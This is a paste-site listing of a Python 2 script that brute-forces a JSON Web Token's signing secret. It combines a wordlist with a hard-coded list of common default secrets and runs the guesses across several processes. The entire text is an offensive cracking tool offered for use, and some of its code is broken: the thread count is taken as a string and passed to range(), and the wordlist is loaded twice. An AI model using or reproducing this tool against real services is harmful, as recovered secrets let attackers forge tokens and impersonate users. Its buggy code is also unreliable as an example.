· 9 years ago · Jan 12, 2017, 04:04 AM
1#!/usr/bin/env python
2
3import sys
4import jwt
5import json
6import multiprocessing as mp
7from multiprocessing import current_process
8import argparse
9import Queue
10from time import sleep
11
12debug = False
13wordlist_q = mp.Manager().Queue()
14found = mp.Manager().Queue()
15
16# A few default keys pulled from Stack Overflow
17default_keys = ["secret",
18 "secret123",
19 "use-a-good-secret-here",
20 "my_secret",
21 "random_secret_key",
22 "secret-key",
23 "LongAndHardToGuessValueWithSpecialCharacters@^($%*$%",
24 "my-firebase-secret"]
25
26
27def check(token, wordlist_q, found):
28 print "[*] Cracking JWT"
29 while found.empty() and wordlist_q.empty() is False:
30 try:
31 candidate = wordlist_q.get()
32 except:
33 continue
34 try:
35 if debug:
36 print "[*] Trying key: %s" % candidate
37 pd = jwt.decode(token, key=candidate)
38 print "[!] Found key: %s" % candidate
39 found.put(candidate)
40 except jwt.DecodeError:
41 wordlist_q.task_done()
42
43 return
44
45
46def mk_queue(wordlist, q):
47 print "[*] Loading wordlist"
48 with open(wordlist, 'rb') as fin:
49 for key in default_keys:
50 q.put(key)
51
52 for line in fin:
53 q.put(line.strip())
54
55
56def main():
57 ap = argparse.ArgumentParser()
58 ap.add_argument('--jwt', '-j', type=str, help='JWT to brute force', required=True)
59 ap.add_argument('--wordlist', '-w', type=str, help='Wordlist', required=True)
60 ap.add_argument('--threads', '-t', type=str, help='Processing threads', default=mp.cpu_count())
61 args = ap.parse_args()
62
63 token = args.jwt
64 header, payload, signature = token.split('.')
65
66 mk_queue(args.wordlist, wordlist_q)
67 print "Loaded %i words" % wordlist_q.qsize()
68 processes = [mp.Process(target=check, args=(token, wordlist_q, found)) for i in range(args.threads)]
69
70 for proc in processes:
71 proc.start()
72
73 mk_queue(args.wordlist, wordlist_q)
74
75 for proc in processes:
76 proc.join()
77
78
79if __name__ == '__main__':
80 main()